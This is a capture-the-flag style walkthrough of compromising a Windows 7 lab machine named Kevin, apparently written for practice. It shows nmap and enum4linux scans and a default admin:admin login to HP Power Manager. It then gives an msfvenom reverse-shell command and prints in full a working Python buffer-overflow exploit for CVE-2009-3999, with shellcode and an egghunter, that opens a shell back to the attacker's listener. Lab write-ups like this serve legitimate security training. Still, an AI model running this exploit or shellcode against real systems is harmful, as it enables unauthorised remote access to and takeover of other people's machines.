Kevin

Nmap Scan

$ nmap -sC -sV -p- --min-rate 10000 -Pn -oN nmap 192.168.155.45
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-07 14:19 +08
Warning: 192.168.155.45 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.155.45
Host is up (0.0058s latency).
Not shown: 62733 closed tcp ports (conn-refused), 2790 filtered tcp ports (no-response)
PORT      STATE SERVICE            VERSION
80/tcp    open  http               GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.155.45/index.asp
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: KEVIN
|   NetBIOS_Domain_Name: KEVIN
|   NetBIOS_Computer_Name: KEVIN
|   DNS_Domain_Name: kevin
|   DNS_Computer_Name: kevin
|   Product_Version: 6.1.7600
|_  System_Time: 2024-06-07T06:20:19+00:00
|_ssl-date: 2024-06-07T06:21:46+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=kevin
| Not valid before: 2024-03-22T01:47:18
|_Not valid after:  2024-09-21T01:47:18
3573/tcp  open  tag-ups-1?
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49158/tcp open  unknown
49160/tcp open  unknown
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: 0s
| smb2-time: 
|   date: 2024-06-07T06:20:19
|_  start_date: 2024-06-07T06:17:50
|_nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:ef:65 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::-
|   Computer name: kevin
|   NetBIOS computer name: KEVIN\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-06-06T23:20:19-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.25 seconds

Initial Access

Enum4Linux

Anonymous

$ enum4linux -a -u '' -p '' 192.168.155.45              
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun  7 14:23:04 2024

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.155.45                                                                                                                                                                                 
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.155.45 )===========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got domain/workgroup name: WORKGROUP                                                                                                                                                                          
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Nbtstat Information for 192.168.155.45 )===============================
                                                                                                                                                                                                                  
Looking up status of 192.168.155.45                                                                                                                                                                               
        KEVIN           <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        KEVIN           <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-AB-EF-65

 ==================================( Session Check on 192.168.155.45 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Server 192.168.155.45 allows sessions using username '', password ''                                                                                                                                          
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Getting domain SID for 192.168.155.45 )===============================
                                                                                                                                                                                                                  
do_cmd: Could not initialise lsarpc. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                            

[+] Can't determine if host is part of domain or part of a workgroup                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==================================( OS information on 192.168.155.45 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't get OS info with smbclient                                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got OS info for 192.168.155.45 from srvinfo:                                                                                                                                                                  
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                            


 ======================================( Users on 192.168.155.45 )======================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED                                                                                                                                               
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ================================( Share Enumeration on 192.168.155.45 )================================
                                                                                                                                                                                                                  
do_connect: Connection to 192.168.155.45 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                                                                                                         

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.155.45                                                                                                                                                                    
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===========================( Password Policy Information for 192.168.155.45 )===========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Unexpected error from polenum:                                                                                                                                                                                
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[+] Attaching to 192.168.155.45 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:192.168.155.45)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.



[E] Failed to get password policy with rpcclient                                                                                                                                                                  
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

 ======================================( Groups on 192.168.155.45 )======================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Getting builtin groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting builtin group memberships:                                                                                                                                                                           
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local groups:                                                                                                                                                                                        
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local group memberships:                                                                                                                                                                             
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain group memberships:                                                                                                                                                                            
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 =================( Users on 192.168.155.45 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.                                                                                                                                         
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==============================( Getting printer info for 192.168.155.45 )==============================
                                                                                                                                                                                                                  
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED                                                                                                                                           


enum4linux complete on Fri Jun  7 14:23:06 2024

Guest

$ enum4linux -a -u 'guest' -p '' 192.168.155.45
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun  7 14:23:43 2024

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.155.45                                                                                                                                                                                 
RID Range ........ 500-550,1000-1050
Username ......... 'guest'
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.155.45 )===========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got domain/workgroup name: WORKGROUP                                                                                                                                                                          
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Nbtstat Information for 192.168.155.45 )===============================
                                                                                                                                                                                                                  
Looking up status of 192.168.155.45                                                                                                                                                                               
        KEVIN           <00> -         B <ACTIVE>  Workstation Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
        KEVIN           <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser

        MAC Address = 00-50-56-AB-EF-65

 ==================================( Session Check on 192.168.155.45 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Server doesn't allow session using username 'guest', password ''.  Aborting remainder of tests.

Port 80

There is a HP Power Manager website running on that port.

After doing some researching, the default password is admin. So we will try put admin:admin.

Sure enough, we are able to access using the admin account.

After enumerating a while, we can see the version in the logs.

CVE-2009-3999

After searching online, there is a Buffer Overload exploit that we can use to get a reverse shell back.

GitHub - CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3: This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari. For the original python2 script visit: https://github.com/Muhammd/HP-Power-ManagerGitHub

We will need to generate the shell code for the reverse shell using msfvenom.

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.206 LPORT=4444  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of python file: 1722 bytes
buf =  b""
buf += b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\xd2\x8c\xb3\x94\x83\xee\xfc\xe2\xf4"
buf += b"\x2e\x64\x31\x94\xd2\x8c\xd3\x1d\x37\xbd\x73\xf0"
buf += b"\x59\xdc\x83\x1f\x80\x80\x38\xc6\xc6\x07\xc1\xbc"
buf += b"\xdd\x3b\xf9\xb2\xe3\x73\x1f\xa8\xb3\xf0\xb1\xb8"
buf += b"\xf2\x4d\x7c\x99\xd3\x4b\x51\x66\x80\xdb\x38\xc6"
buf += b"\xc2\x07\xf9\xa8\x59\xc0\xa2\xec\x31\xc4\xb2\x45"
buf += b"\x83\x07\xea\xb4\xd3\x5f\x38\xdd\xca\x6f\x89\xdd"
buf += b"\x59\xb8\x38\x95\x04\xbd\x4c\x38\x13\x43\xbe\x95"
buf += b"\x15\xb4\x53\xe1\x24\x8f\xce\x6c\xe9\xf1\x97\xe1"
buf += b"\x36\xd4\x38\xcc\xf6\x8d\x60\xf2\x59\x80\xf8\x1f"
buf += b"\x8a\x90\xb2\x47\x59\x88\x38\x95\x02\x05\xf7\xb0"
buf += b"\xf6\xd7\xe8\xf5\x8b\xd6\xe2\x6b\x32\xd3\xec\xce"
buf += b"\x59\x9e\x58\x19\x8f\xe4\x80\xa6\xd2\x8c\xdb\xe3"
buf += b"\xa1\xbe\xec\xc0\xba\xc0\xc4\xb2\xd5\x73\x66\x2c"
buf += b"\x42\x8d\xb3\x94\xfb\x48\xe7\xc4\xba\xa5\x33\xff"
buf += b"\xd2\x73\x66\xc4\x82\xdc\xe3\xd4\x82\xcc\xe3\xfc"
buf += b"\x38\x83\x6c\x74\x2d\x59\x24\xfe\xd7\xe4\x73\x3c"
buf += b"\xff\x42\xdb\x96\xd2\x9d\xef\x1d\x34\xe6\xa3\xc2"
buf += b"\x85\xe4\x2a\x31\xa6\xed\x4c\x41\x57\x4c\xc7\x98"
buf += b"\x2d\xc2\xbb\xe1\x3e\xe4\x43\x21\x70\xda\x4c\x41"
buf += b"\xba\xef\xde\xf0\xd2\x05\x50\xc3\x85\xdb\x82\x62"
buf += b"\xb8\x9e\xea\xc2\x30\x71\xd5\x53\x96\xa8\x8f\x95"
buf += b"\xd3\x01\xf7\xb0\xc2\x4a\xb3\xd0\x86\xdc\xe5\xc2"
buf += b"\x84\xca\xe5\xda\x84\xda\xe0\xc2\xba\xf5\x7f\xab"
buf += b"\x54\x73\x66\x1d\x32\xc2\xe5\xd2\x2d\xbc\xdb\x9c"
buf += b"\x55\x91\xd3\x6b\x07\x37\x53\x89\xf8\x86\xdb\x32"
buf += b"\x47\x31\x2e\x6b\x07\xb0\xb5\xe8\xd8\x0c\x48\x74"
buf += b"\xa7\x89\x08\xd3\xc1\xfe\xdc\xfe\xd2\xdf\x4c\x41"

This is the modified exploit that we will be using the get the shell

#!/usr/bin/python
# This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
# For the original script visit: https://github.com/Muhammd/HP-Power-Manager
# 
# Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
# <Remote IP Address>: ip address the HP Power Manager is running on
# <Remote Port>: port the application is running on
# <Local Listener Port>: local port your shellcode is connecting back to -> script starts nc listener to catch reverse shell
#
# Swap out the shellcode
# Tested on HP Power Manager 4.2 (Build 7) on Windows 7 Ultimate (6.1.7600 N/A Build 7600)
# Author: CountablyInfinite

from urllib import parse
from time import sleep
from sys import argv,exit
from socket import socket,AF_INET,SOCK_STREAM
from os import system

try:
   HOST  = argv[1]
   PORT = int(argv[2]) # port the remote application is running on
   LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta
   if (len(argv)>4):
      raise IndexError
except IndexError: 
   print("Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>" % argv[0])
   print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
   exit()

#msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
egg = "b33fb33f"
buf = egg
buf += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += "\x81\x76\x0e\xd2\x8c\xb3\x94\x83\xee\xfc\xe2\xf4"
buf += "\x2e\x64\x31\x94\xd2\x8c\xd3\x1d\x37\xbd\x73\xf0"
buf += "\x59\xdc\x83\x1f\x80\x80\x38\xc6\xc6\x07\xc1\xbc"
buf += "\xdd\x3b\xf9\xb2\xe3\x73\x1f\xa8\xb3\xf0\xb1\xb8"
buf += "\xf2\x4d\x7c\x99\xd3\x4b\x51\x66\x80\xdb\x38\xc6"
buf += "\xc2\x07\xf9\xa8\x59\xc0\xa2\xec\x31\xc4\xb2\x45"
buf += "\x83\x07\xea\xb4\xd3\x5f\x38\xdd\xca\x6f\x89\xdd"
buf += "\x59\xb8\x38\x95\x04\xbd\x4c\x38\x13\x43\xbe\x95"
buf += "\x15\xb4\x53\xe1\x24\x8f\xce\x6c\xe9\xf1\x97\xe1"
buf += "\x36\xd4\x38\xcc\xf6\x8d\x60\xf2\x59\x80\xf8\x1f"
buf += "\x8a\x90\xb2\x47\x59\x88\x38\x95\x02\x05\xf7\xb0"
buf += "\xf6\xd7\xe8\xf5\x8b\xd6\xe2\x6b\x32\xd3\xec\xce"
buf += "\x59\x9e\x58\x19\x8f\xe4\x80\xa6\xd2\x8c\xdb\xe3"
buf += "\xa1\xbe\xec\xc0\xba\xc0\xc4\xb2\xd5\x73\x66\x2c"
buf += "\x42\x8d\xb3\x94\xfb\x48\xe7\xc4\xba\xa5\x33\xff"
buf += "\xd2\x73\x66\xc4\x82\xdc\xe3\xd4\x82\xcc\xe3\xfc"
buf += "\x38\x83\x6c\x74\x2d\x59\x24\xfe\xd7\xe4\x73\x3c"
buf += "\xff\x42\xdb\x96\xd2\x9d\xef\x1d\x34\xe6\xa3\xc2"
buf += "\x85\xe4\x2a\x31\xa6\xed\x4c\x41\x57\x4c\xc7\x98"
buf += "\x2d\xc2\xbb\xe1\x3e\xe4\x43\x21\x70\xda\x4c\x41"
buf += "\xba\xef\xde\xf0\xd2\x05\x50\xc3\x85\xdb\x82\x62"
buf += "\xb8\x9e\xea\xc2\x30\x71\xd5\x53\x96\xa8\x8f\x95"
buf += "\xd3\x01\xf7\xb0\xc2\x4a\xb3\xd0\x86\xdc\xe5\xc2"
buf += "\x84\xca\xe5\xda\x84\xda\xe0\xc2\xba\xf5\x7f\xab"
buf += "\x54\x73\x66\x1d\x32\xc2\xe5\xd2\x2d\xbc\xdb\x9c"
buf += "\x55\x91\xd3\x6b\x07\x37\x53\x89\xf8\x86\xdb\x32"
buf += "\x47\x31\x2e\x6b\x07\xb0\xb5\xe8\xd8\x0c\x48\x74"
buf += "\xa7\x89\x08\xd3\xc1\xfe\xdc\xfe\xd2\xdf\x4c\x41"

#egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
hunter =  b""
hunter += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
hunter += b"\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x89\xd7"
hunter += b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

buffer = b"\x41" * (721 -len(hunter))
buffer += b"\x90"*30 + hunter
buffer += b"\xeb\xc2\x90\x90"            #JMP SHORT 0xC2 
buffer += b"\xd5\x74\x41" 	              #pop esi # pop ebx # ret 10 (DevManBE.exe)

content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)
content+="&bMonth=03&bDay=12&bYear=2017&eMonth=03&eDay=12&eYear=2017&LogType=Application&actionType=1%253B"

payload =  "POST /goform/formExportDataLogs HTTP/1.1\r\n"
payload += "Host: %s\r\n" % HOST
payload += "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
payload += "Accept: %s\r\n" % buf
payload += "Referer: http://%s/Contents/exportLogs.asp?logType=Application\r\n" % HOST
payload += "Content-Type: application/x-www-form-urlencoded\r\n"
payload += "Content-Length: %s\r\n\r\n" % len(content)
payload += content

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print("[+] HP Power Manager 'formExportDataLogs' Buffer Overflow Exploit")
print("[+] Sending exploit to Ip " +str(HOST)+" on port "+str(PORT)+". Starting local listener on port "+str(LPORT))
s.send(payload.encode('latin1'))
system("nc -nlvp "+ str(LPORT))
s.close()

After which, we will just need to run the exploit, we are able to get a reverse shell.

PreviousJacko NextKyoto

Last updated 1 year ago

hashtagNmap Scan

hashtagInitial Access

hashtagEnum4Linux

hashtagAnonymous

hashtagGuest

hashtagPort 80

hashtagCVE-2009-3999